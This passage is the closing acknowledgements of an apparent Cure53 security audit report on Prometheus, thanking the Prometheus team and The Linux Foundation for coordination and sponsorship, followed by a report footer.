Ziemke from the Prometheus team as well as Chris Aniszczyk of The Linux Foundation,
for their excellent project coordination, support and assistance, both before and during
this assignment. Special gratitude also need to be extended to The Linux Foundation for
sponsoring this project.

Cure53, Berlin · 06/11/18 18/18

You can also read